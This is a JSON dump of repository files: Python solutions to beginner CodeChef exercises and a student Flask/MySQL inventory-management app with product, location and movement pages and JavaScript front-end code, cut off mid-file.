"text": "#You are given two integers A and B. \n#Print the number closest to A but less than or equal to A which is completely divisible by B.\n\nA = int(input())\nB = int(input())\nif A<B :\n\tprint(\"0\")\nelse :\n\tprint( (A//B)*B )\n\t\n\t\n#Sample Input 1:\n#23\n#7\n#Sample Output 1:\n#21\n"
},
{
"alpha_fraction": 0.6709677577018738,
"alphanum_fraction": 0.6903225779533386,
"avg_line_length": 26.352941513061523,
"blob_id": "ed1758b577616a1f2d581d843026a69a10f7d901",
"content_id": "89b6237293b3c5b40b9dca0ab20dff3d90eb69e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 17,
"path": "/INPRG01/VALTRI.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Raju is planning to visit his favorite restaurant and travels to it by bus.\n#Only the buses whose numbers are divisible by 5 or by 6 will take him to his destination.\n#Now you are given bus number N and find if Raju can take the bus or not.\n#Print \"YES\"(without quotes) if he can take the bus, otherwise print \"NO\" (without quotes).\n\n\nN = int(input())\nif N%5 == 0 or N%6 ==0:\n print(\"YES\")\nelse:\n print(\"NO\")\n\n \n#Sample Input 1:\n#0\n#Sample Output 1:\n#YES\n"
},
{
"alpha_fraction": 0.4067796468734741,
"alphanum_fraction": 0.4237288236618042,
"avg_line_length": 21.200000762939453,
"blob_id": "bc4ff22e2338e8ecb788ce17b7f149c8eaa41576",
"content_id": "5870074bdeca287cfb6caf94cd88400bf014741f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/PEC2021A/REVMEE.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\nA = list(map(int , input().split()[:N]))\r\nwhile N >= 1:\r\n N -= 1\r\n print(A[N] , end = \" \")\r\n\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5094339847564697,
"avg_line_length": 10,
"blob_id": "5bbcf8af283b8faf2d07b26482da38990ee37c95",
"content_id": "b433b60ce87321e1523e42bbc4e32c8561a8d42c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 9,
"path": "/PEC2021C/CNTDIST.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\n\r\ns = set()\r\nfor i in range(N):\r\n\tn = int(input())\r\n\ts.add(n)\r\n\r\nprint(2)\r\nprint(len(s))"
},
{
"alpha_fraction": 0.5411764979362488,
"alphanum_fraction": 0.6117647290229797,
"avg_line_length": 15,
"blob_id": "12642bb96e104dbab7378d15685abf2a520e79b3",
"content_id": "f18802453acb2acf2e435b9f8bf13464a3fbb28c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 15,
"path": "/INPRG01/LSTSEV .py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Given a number N and check if its second last digit is 7 or not.\r\n#If it's 7 then print 1, otherwise print 0 in a single line\r\n\r\n\r\nN = int(input())\r\nif (N//10)%10 == 7:\r\n\tprint(1) \r\nelse:\r\n\tprint(0)\r\n\t\r\n\t\r\n#Sample Input 2:\r\n#4176\r\n#Sample Output 2:\r\n#1\r\n"
},
{
"alpha_fraction": 0.38372093439102173,
"alphanum_fraction": 0.40697672963142395,
"avg_line_length": 17.33333396911621,
"blob_id": "c06cf7fc1016a511789b2f646c1514178cf64f1a",
"content_id": "002d919a51b04fd9afc0c79e0747b133d1cb03a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 9,
"path": "/PEC2021A/FDGHLM.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "A , B = map(int , input().split())\r\ni = 1 \r\nl = []\r\nwhile i <= A:\r\n if A%i == 0 and B%i == 0:\r\n l.append(i)\r\n i += 1 \r\nlcm = (A*B)//max(l)\r\nprint(max(l) , lcm)"
},
{
"alpha_fraction": 0.5732010006904602,
"alphanum_fraction": 0.6079404354095459,
"avg_line_length": 17.952381134033203,
"blob_id": "af6ba870ec172122cc00def5d93c99859372d43c",
"content_id": "ff28328a7c778f70e089805de8fc717779e8b258",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 21,
"path": "/INPRG01/NUMPLIN.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#You're given a number N, now check if the number N is palindrome or not.\n#Print \"YES\"(without quotes) if it's a palindrome, otherwise print \"NO\" (without quotes).\n\n\nN = int(input())\noriginal_N = N\nresult = 0 \nwhile N != 0:\n r = N%10\n result = 10*result + r\n N = N//10\nif result == original_N:\n print(\"YES\")\nelse:\n print(\"NO\")\n \n \n#Sample Input 1:\n#8668\n#Sample Output 1:\n#YES\n \n"
},
{
"alpha_fraction": 0.5025906562805176,
"alphanum_fraction": 0.5259067416191101,
"avg_line_length": 23.866666793823242,
"blob_id": "8bfaaabe0ebf8bb6d13485d7b0bf4f2e062df037",
"content_id": "278d06d2f8cd8e9d3f527c6230574a60968e4d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/PEC2021C/TOLLCNT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "from math import ceil\r\nentry,exit, plate = {},{},[]\r\nfor i in range(int(input())):\r\n activity = input()\r\n number = input() \r\n t = int(input())\r\n if activity == \"entry\":\r\n entry[number] = t\r\n else :\r\n exit[number] = t\r\nhours, amount = 0,0\r\nfor j in entry.keys() :\r\n hours = ceil((exit[j] - entry[j])/60)\r\n amount += 60 + (hours -1)*30\r\nprint(amount)"
},
{
"alpha_fraction": 0.4878048896789551,
"alphanum_fraction": 0.5040650367736816,
"avg_line_length": 18.83333396911621,
"blob_id": "348269842d1dfe8c4926c452044af9996c655f9b",
"content_id": "a3a0385869e30d07d184207d5c23053214550ffd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 6,
"path": "/PEC2021A/FINDMLI.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N , K = map(int , input().split())\r\nA = list(map(int, input().split()[:N]))\r\nif K in A:\r\n print(1)\r\nelse:\r\n print(-1)"
},
{
"alpha_fraction": 0.523809552192688,
"alphanum_fraction": 0.5442177057266235,
"avg_line_length": 11.545454978942871,
"blob_id": "4f7f1562ebb23bfae0e69eddd44923196b574e9f",
"content_id": "090056fb3199b76213485605a9205b47c35d3544",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 11,
"path": "/PEC2021C/PAIRPROD.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "n = int(input())\r\nsum = int(input())\r\ntsum = 0\r\n\r\nfor i in range(n-1):\r\n\tnum = int(input())\r\n\ttsum += num*sum\r\n\tsum += num\r\n\r\nprint(2)\r\nprint(tsum)"
},
{
"alpha_fraction": 0.5626911520957947,
"alphanum_fraction": 0.6177369952201843,
"avg_line_length": 17.16666603088379,
"blob_id": "a7ee03f3edbabecb0269f8edf7ffffbde67c2a2e",
"content_id": "fe17707ac5565a5255c2e8e68d6e75c667e17d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/INPRG01/EOMUL.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Odd Even Multiple \n\n#You are given an integer N. If N is not divisible by 3 then print −1.\n#If N is an odd multiple of 3 the print 1\n#and if N is an even multiple of 3 then print 0.\n\nN =int(input())\nif N%3 != 0:\n print(\"-1\")\nelif N%6 == 0:\n print(\"0\")\nelse:\n print(\"1\")\n \n#Sample Input 1:\n#24\n#Sample Output 1:\n#0\n"
},
{
"alpha_fraction": 0.43654823303222656,
"alphanum_fraction": 0.46192893385887146,
"avg_line_length": 31.16666603088379,
"blob_id": "2f29a2254ffa59c1e85ca46834f03ab95c6f845a",
"content_id": "b01653db7276d6afc74ec6603fb632f5763a61e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 6,
"path": "/PEC2021B/NTSMPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "for row in range(1 , (int(input())+1)):\r\n for i in range(row , row*2 ):\r\n print(i , end = \" \")\r\n for i in reversed(range(row , row*2-1 )):\r\n print(i , end = \" \")\r\n print(\" \")"
},
{
"alpha_fraction": 0.5290697813034058,
"alphanum_fraction": 0.5348837375640869,
"avg_line_length": 17.33333396911621,
"blob_id": "dcec2dbbb24e31a9f5a6365540a03645925736b0",
"content_id": "53c0d1c7344a2be43458931a01f96e386cee7146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/PEC2021C/LINSRCH.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "s = set()\r\nfor i in range(int(input())):\r\n\ts.add(int(input()))\r\nprint(1)\r\nfor j in range(int(input())):\r\n\tif int(input()) in s:\r\n\t print(\"yes\")\r\n\telse:\r\n\t print(\"no\")"
},
{
"alpha_fraction": 0.38513514399528503,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 11.636363983154297,
"blob_id": "bfb7bf7074d1756e67853f37e00b4c6283b635dd",
"content_id": "c459162a7761cfc12aa3f7691797ce6177aca1d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 11,
"path": "/PEC2021A/PRCHECK.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\ncount = 0\r\ni = 1\r\nwhile i**2 <= N:\r\n\tif N%i == 0 :\r\n\t\tcount += 1\r\n\ti += 1\r\nif count == 1 and N!= 1 :\r\n\tprint(1)\r\nelse :\r\n\tprint(0)"
},
{
"alpha_fraction": 0.31496062874794006,
"alphanum_fraction": 0.34645670652389526,
"avg_line_length": 16.428571701049805,
"blob_id": "43b512d04d52c8de370693ad738dfc8bbf1352e9",
"content_id": "2ee823d5359e617e36c243fe13d1be57131a172c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/PEC2021A/RNGEODD.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "L , R = map(int , input().split())\r\nwhile L <= R:\r\n if L%2==0:\r\n L += 1 \r\n else:\r\n print(L)\r\n L += 2"
},
{
"alpha_fraction": 0.4150943458080292,
"alphanum_fraction": 0.44025155901908875,
"avg_line_length": 14.100000381469727,
"blob_id": "dda36d8cabdeb2352ee60291227cc4c666767cb6",
"content_id": "e93463c88ab76027c68f3c5cdd6d0a2afdaf9c83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 10,
"path": "/PEC2021C/PREFMAX.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "max , cnt = 0 , 0\r\n\r\nfor i in range(int(input())):\r\n num = int(input())\r\n if num > max:\r\n cnt += 1 \r\n max = num\r\n \r\nprint(2)\r\nprint(cnt)"
}
] | 20 |
sankarsubramaniankvs/hybrowlabs | https://github.com/sankarsubramaniankvs/hybrowlabs | 58883762d818b4bfd05887fbcdbfc3d0228b2bf4 | aafa7e377803e29f60bbac98ba783c3d7608e6da | 76e9adf3a12b66f523ca9023608c7925d82e9f92 | refs/heads/main | 2023-05-11T07:59:24.621389 | 2021-06-06T05:44:11 | 2021-06-06T05:44:11 | 374,277,158 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5034116506576538,
"alphanum_fraction": 0.5069497227668762,
"avg_line_length": 32.18260955810547,
"blob_id": "c642891db4b96a49b9abc03ff02e5b411c12ef33",
"content_id": "2f6dd0464691644a09419997fded02146eb9a2bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3957,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 115,
"path": "/api/locations.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector \r\n\r\nclass location:\r\n def get_location_products(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM '+ name)\r\n r = cursor.fetchall()\r\n return r\r\n def location_edit(id,name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n sql = \"UPDATE locations SET name=%s WHERE ID=%s\"\r\n val = (name,id)\r\n cursor.execute(sql,val) \r\n mydb.commit()\r\n def location_add(name):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS locations(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS \"+name+ \"(id INT PRIMARY KEY, product VARCHAR(40) NOT NULL, quantity INT);\")\r\n cursor.execute('SELECT * FROM locations;')\r\n r = cursor.fetchall()\r\n f=1\r\n for i in r:\r\n if i[1]==name:\r\n f=0\r\n break\r\n if(f):\r\n l = len(r)+1\r\n sql = \"INSERT INTO locations(id,name) VALUES (%s,%s)\"\r\n val = (l,name)\r\n cursor.execute(sql,val)\r\n mydb.commit()\r\n return 'Location Added Successfully'\r\n else:\r\n return 'Location Exists!'\r\n\r\n def get_locations():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor() \r\n cursor.execute(\"CREATE TABLE IF NOT EXISTS locations(id INT PRIMARY KEY, name VARCHAR(40));\")\r\n cursor.execute('SELECT * FROM locations;')\r\n r=cursor.fetchall()\r\n return r \r\n\r\n def get(id):\r\n id=int(id)\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n sql = \"\"\"SELECT * FROM locations WHERE id=%s or id=%s\"\"\"\r\n val = (id,id)\r\n cursor.execute(sql,val)\r\n return cursor.fetchone() \r\n def location_id_list():\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute('SELECT * FROM locations;')\r\n cursor.fetchall()\r\n return str(cursor.rowcount)\r\n def location_delete(id):\r\n mydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\",\r\n database =\"hybrowlabs\"\r\n )\r\n cursor = mydb.cursor()\r\n cursor.execute(\"SELECT name FROM locations WHERE id=%s OR id=%s;\",(id,id))\r\n name=cursor.fetchone()\r\n cursor.execute('DROP TABLE '+name[0])\r\n sql = \"DELETE FROM locations WHERE id=%s OR id=%s;\"\r\n val=(id,id)\r\n cursor.execute(sql,val)\r\n cursor.execute('SELECT * FROM locations;')\r\n data = cursor.fetchall() \r\n cursor.execute('TRUNCATE TABLE locations')\r\n d = 1 \r\n for i in data:\r\n sql = \"INSERT INTO locations(id,name) VALUES(%s,%s);\"\r\n val = (d,i[1])\r\n cursor.execute(sql,val)\r\n d+=1\r\n mydb.commit()\r\n return 'success'\r\n \r\n\r\n\r\n "
},
{
"alpha_fraction": 0.5719966888427734,
"alphanum_fraction": 0.5743165016174316,
"avg_line_length": 26.53900718688965,
"blob_id": "b2bd33f9b1bd7ca2e644b0ff8d41e4b29e692a9a",
"content_id": "3f0bec4d29cbf2e182f4b7abd498222c0f3219b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12070,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 423,
"path": "/server.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, session, jsonify,url_for,abort\r\nfrom api.signin import user_signin\r\nfrom api.change_password import change_pass \r\nfrom api.products import product as p\r\nfrom api.locations import location as l\r\nfrom api.movements import movement as m\r\n\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'secretkey'\r\nsession=False \r\nsession_user = '1'\r\nproduct=''\r\nlocation=''\r\nlocation_products=''\r\nmovement=''\r\n\r\[email protected]('/',methods=['GET'])\r\[email protected]('/login',methods=['GET'])\r\ndef login_page():\r\n return render_template(\"login.html\")\r\n\r\n\r\[email protected]('/auth',methods=['POST'])\r\ndef authenticate():\r\n global session, session_user\r\n if(request.method=='POST'):\r\n data = request.get_json()\r\n username = data.get('username')\r\n password = data.get('password')\r\n r=user_signin.authenticate_user(username,password)\r\n if(r=='success'):\r\n session=True\r\n session_user = username \r\n return r\r\[email protected]('/loginredirect',methods=['GET'])\r\ndef login_redirect():\r\n global session,session_user\r\n if(session_user!='1' and session):\r\n return redirect(f\"/user_dashboard/{session_user}\")\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/user_dashboard/<username>',methods=['POST','GET'])\r\ndef dashboard(username):\r\n global session,session_user\r\n if(session and session_user==username):\r\n return render_template('dashboard.html')\r\n else:\r\n session=False\r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/password_setting',methods=['POST','GET'])\r\ndef password_route():\r\n global session, session_user\r\n if(session_user!=1 and session):\r\n return redirect(f\"/change_password/{session_user}\")\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/change_password/<username>',methods=['POST','GET'])\r\ndef change_password(username):\r\n global session, session_user\r\n if(session and session_user==username):\r\n return render_template('change_password.html')\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/change_pass', methods=['POST'])\r\ndef change():\r\n global session,session_user\r\n\r\n if(request.method=='POST' and session):\r\n data = request.get_json()\r\n current = data.get('current')\r\n new = data.get('new')\r\n confirm = data.get('confirm')\r\n return change_pass.change(session_user,confirm,current)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\n\r\n\r\[email protected]('/products', methods=['POST','GET'])\r\ndef products():\r\n global session,session_user\r\n if(session):\r\n products = p.get_products()\r\n return render_template('products.html',products = products)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/add_product',methods=['POST','GET'])\r\ndef add_product():\r\n global session,session_user\r\n if(session):\r\n return render_template('add_product.html')\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/add_location',methods=['POST','GET'])\r\ndef add_location():\r\n global session,session_user\r\n if(session):\r\n return render_template('add_location.html')\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/add_movement',methods=['POST','GET'])\r\ndef add_movement():\r\n global session,session_user\r\n if(session):\r\n products = p.get_products()\r\n locations = l.get_locations()\r\n return render_template('add_movement.html',products=products,locations=locations)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/product_add',methods=['POST'])\r\ndef product_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n product = data.get('name')\r\n return p.product_add(product)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_add',methods=['POST'])\r\ndef location_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n location = data.get('name')\r\n return l.location_add(location)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_add',methods=['POST'])\r\ndef movement_add():\r\n global session \r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n fr = data.get('from')\r\n to = data.get('to')\r\n product = data.get('product')\r\n quantity = data.get('quantity')\r\n print(fr,to,product,quantity)\r\n r= m.movement_add(fr,to,product,quantity)\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/product_id_list',methods=['POST'])\r\ndef product_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=p.product_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_id_list',methods=['POST'])\r\ndef location_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=l.location_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_id_list',methods=['POST'])\r\ndef movement_list():\r\n global session\r\n if(session):\r\n if(request.method=='POST'):\r\n r=m.movement_id_list()\r\n return r\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/product_edit_id',methods=['POST'])\r\ndef find_product():\r\n global session,product\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n product = p.get(id)\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_edit_id',methods=['POST'])\r\ndef find_location():\r\n global session,location\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n location = l.get(id)\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/movement_edit_id',methods=['POST'])\r\ndef find_movement():\r\n global session,movement,location,product\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('id')\r\n\r\n movement = m.get(id)\r\n\r\n\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_view_id',methods=['POST'])\r\ndef view_id_location():\r\n global session,location,location_products,location\r\n if(session):\r\n if request.method=='POST':\r\n data = request.get_json()\r\n id = data.get('name')\r\n location=id\r\n r = l.get_location_products(id)\r\n location_products=r\r\n return 'success'\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/location_view_page',methods=['GET','POST'])\r\ndef view_location():\r\n global session, location_products\r\n if(session):\r\n return render_template('location_view.html',location=location,items=location_products)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n \r\n\r\[email protected]('/product_edit_page',methods=['POST','GET'])\r\ndef product_edit():\r\n global product\r\n return render_template('edit_product.html',product=product)\r\n\r\[email protected]('/location_edit_page',methods=['POST','GET'])\r\ndef location_edit():\r\n global location\r\n return render_template('edit_location.html',location=location)\r\n\r\[email protected]('/movement_edit_page',methods=['POST','GET'])\r\ndef movement_edit():\r\n global movement\r\n products = p.get_products()\r\n locations = l.get_locations()\r\n return render_template('edit_movement.html',movement=movement,products=products,locations=locations)\r\n\r\n\r\[email protected]('/product_edit_function',methods=['POST'])\r\ndef product_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n name = data.get('name')\r\n p.product_edit(id,name)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\[email protected]('/location_edit_function',methods=['POST'])\r\ndef location_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n name = data.get('name')\r\n l.location_edit(id,name)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\[email protected]('/movement_edit_function',methods=['POST'])\r\ndef movement_editor():\r\n global session\r\n if(session and request.method=='POST'):\r\n data = request.get_json()\r\n id = data.get('id')\r\n fr = data.get('from')\r\n to = data.get('to')\r\n pid = data.get('product')\r\n qty = data.get('quantity')\r\n m.movement_edit(id,fr,to,pid,qty)\r\n return 'success'\r\n else:\r\n return 'failure'\r\n\r\n\r\[email protected]('/product_delete',methods=['POST'])\r\ndef product_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return p.product_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\[email protected]('/location_delete',methods=['POST'])\r\ndef location_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return l.location_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/movement_delete',methods=['POST'])\r\ndef movement_delete():\r\n global session \r\n if(session):\r\n if(request.method=='POST'):\r\n data = request.get_json() \r\n id = data.get('id')\r\n return m.movement_delete(id)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/locations',methods=['POST','GET'])\r\ndef locations():\r\n global session,session_user\r\n if(session):\r\n locations = l.get_locations()\r\n return render_template('locations.html',locations = locations)\r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\[email protected]('/movements',methods=['POST','GET'])\r\ndef movements():\r\n global session,session_user\r\n if(session):\r\n movements = m.get_movements()\r\n return render_template('movements.html',movements = movements) \r\n else:\r\n session=False \r\n session_user='1'\r\n return redirect(url_for(\"login_page\"))\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)"
},
{
"alpha_fraction": 0.6849315166473389,
"alphanum_fraction": 0.6849315166473389,
"avg_line_length": 14.44444465637207,
"blob_id": "ebc052cf8dfe5ffbef467a2ff483d14da2561578",
"content_id": "261f4999febb39a99b95ffa5b6f5b0c1f83c8a6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/api/connection.py",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"administrator\",\r\n password=\"administrator\"\r\n)\r\n\r\nprint(mydb)"
},
{
"alpha_fraction": 0.5742630362510681,
"alphanum_fraction": 0.5753968358039856,
"avg_line_length": 26.03174591064453,
"blob_id": "27e74423683f77502524c08ddcdc48a36cb61161",
"content_id": "9b999dee2639547aebd78e90f35b5efac0a2e2d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 63,
"path": "/static/edit_product.js",
"repo_name": "sankarsubramaniankvs/hybrowlabs",
"src_encoding": "UTF-8",
"text": "document.getElementById('back-button').addEventListener('click', () => {\r\n document.location = '/products'\r\n});\r\n\r\n\r\ndocument.getElementById('edit-button').addEventListener('click', () => {\r\n pname = document.getElementById('name').value\r\n id = document.getElementById('id').innerText\r\n auth = document.getElementById('auth')\r\n console.log(pname, id)\r\n if (pname == '') {\r\n auth.innerHTML = 'Product Name Cannot be empty!'\r\n }\r\n else {\r\n const data = { 'id': id, 'name': pname }\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST', '/product_edit_function', true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do something to response\r\n r = this.responseText\r\n if (r == 'success') {\r\n auth.innerHTML = r\r\n auth.style['color'] = 'green'\r\n }\r\n\r\n }\r\n xhr.send(JSON.stringify(data))\r\n };\r\n\r\n\r\n\r\n})\r\n\r\ndocument.addEventListener('keypress', function (event) {\r\n if (event.keyCode == 13) {\r\n pname = document.getElementById('name').value\r\n id = document.getElementById('id').innerText\r\n auth = document.getElementById('auth')\r\n console.log(pname, id)\r\n if (pname == '') {\r\n auth.innerHTML = 'Product Name Cannot be empty!'\r\n }\r\n else {\r\n const data = { 'id': id, 'name': pname }\r\n var xhr = new XMLHttpRequest();\r\n xhr.open('POST', '/product_edit_function', true);\r\n xhr.setRequestHeader('Content-type', 'application/json');\r\n xhr.onload = function () {\r\n // do 